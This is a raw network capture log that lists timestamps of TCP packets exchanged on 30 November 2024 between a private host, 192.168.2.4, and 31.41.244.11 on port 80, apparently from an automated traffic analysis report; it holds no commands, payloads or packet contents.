                                                      Nov 30, 2024 18:08:29.315150023 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.315200090 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.315381050 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.315423965 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.316260099 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.316570044 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.316615105 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.317615986 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.317667961 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.317729950 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.317773104 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.319041967 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.319056988 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.319102049 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.319834948 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.320038080 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.320260048 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.320615053 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.320625067 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.320658922 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.320677042 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.321290016 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.321474075 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.321666002 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.322237968 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.322315931 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.322470903 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.322516918 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.323364973 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.323467016 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.323580027 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.323626041 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.324243069 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.324444056 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.324491978 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.325290918 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.325335026 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.325468063 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.325506926 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.326272964 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.326498032 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.326539993 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.327280998 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.327327967 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.327519894 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.327564001 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.328391075 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.328447104 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.328756094 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.328799009 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.329313993 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.329535007 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.329583883 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.331069946 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.331336021 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.331847906 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.331934929 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.331976891 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.332293987 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.332355976 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.332669020 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.333053112 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.333096027 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.333427906 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.333787918 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.333828926 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.334366083 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.334407091 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.334562063 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.334603071 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.335339069 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.335419893 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.483572960 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.483712912 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.483944893 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.483993053 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.484082937 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.484122992 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.484489918 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.484529972 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.485030890 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.485069990 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.485414028 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.485455990 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.485596895 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.485636950 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.486402035 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.486444950 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.486604929 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.486651897 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.487421036 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.487466097 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.487631083 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.487674952 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.488424063 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.488656044 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.488697052 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.489442110 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.489489079 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.489641905 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.489679098 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.490468979 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.490510941 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.490689039 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.490731001 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.491468906 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.491517067 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.491652966 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.492482901 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.492535114 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.492688894 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.492744923 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.493504047 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.493561983 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.493701935 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.493769884 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.494540930 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.494580030 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.494728088 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.494770050 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.495559931 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.495604992 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.495867014 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.496527910 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.496573925 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.496728897 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.496773958 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.497634888 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.497675896 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.497868061 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.497905970 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.498892069 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.498925924 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.499233007 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.499274969 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.499672890 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.500128984 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.500170946 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.500659943 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.500698090 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.500832081 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.500879049 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.501616001 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.501663923 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.501751900 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.501794100 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.502583027 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.502624035 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.502794981 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.502832890 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.503597975 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.503634930 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.503801107 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.504605055 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.504645109 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.504789114 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.504832029 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.505635977 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.505670071 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.505816936 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.505857944 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.506624937 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.506660938 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.506819010 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.506856918 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.507669926 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.507838964 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.507879019 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.508646011 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.508706093 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.508835077 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.508872986 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.509718895 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.509758949 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.509974957 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.510015011 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.510649920 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.510688066 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.510870934 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.510910988 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.511683941 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.511883020 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.511920929 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.512679100 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.512716055 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.512883902 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.512919903 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.513675928 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.513714075 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.513919115 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.513959885 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.514700890 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.514744043 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.514904976 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.514945984 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.515775919 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.515942097 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.515988111 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.516701937 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.516746044 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.516911983 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.516953945 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.517744064 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.517785072 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.517944098 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.517987013 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.518737078 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.518774033 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.518958092 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.518999100 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.519747019 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.519943953 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.519987106 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.520757914 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.520797014 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.520948887 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.520992041 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.521835089 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.521874905 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.521996021 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.522037029 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.522777081 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.522819042 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.522994995 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.523032904 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.523802996 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.524027109 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.524077892 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.524813890 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.524869919 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.525037050 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.525078058 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.525867939 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.525913000 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.526038885 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.526077986 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.526870012 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.526926994 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.527045965 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.527086020 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.527833939 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.528058052 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.528105974 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.528887987 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.528934956 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.529043913 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.529083014 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.529841900 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.529886007 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.530035973 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.530072927 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.530952930 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.530996084 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.531124115 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.531164885 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.531919003 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.532166958 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.532207966 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.532882929 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.532922983 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.533164024 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.533418894 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.533930063 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.534113884 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.534159899 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.534898043 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.534941912 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.535099983 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.535137892 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.535923958 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.536111116 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.536151886 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.684844971 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.685022116 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.685086012 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.685411930 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.685458899 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.685784101 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.686033010 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.686326981 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.686377048 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.686526060 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.686574936 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.687344074 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.687486887 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.687573910 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.687616110 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.688359022 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.688410044 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.688497066 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.688595057 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.689349890 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.689399958 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.689574003 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.689666986 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.690365076 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.690440893 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.690574884 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.690620899 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.691359997 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.691414118 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.691559076 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.691605091 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.692387104 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.692676067 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.692720890 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.693404913 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.693449974 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.693604946 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.693937063 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.694401979 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.694449902 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.694650888 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.694695950 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.695420980 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.695621014 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.695672035 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.696414948 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.696479082 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.696614027 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.696860075 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.697427988 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.697462082 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.697896957 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.697943926 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.698445082 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.698498011 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.698666096 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.698712111 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.699439049 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.699486971 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.699661970 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.700459957 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.700527906 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.700680971 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.700725079 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.701462984 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.701673985 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.701682091 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.701716900 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.702478886 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.702521086 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.702696085 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.702743053 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.703489065 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.703660011 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:29.703690052 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:29.703732014 CET4980580192.168.2.431.41.244.11
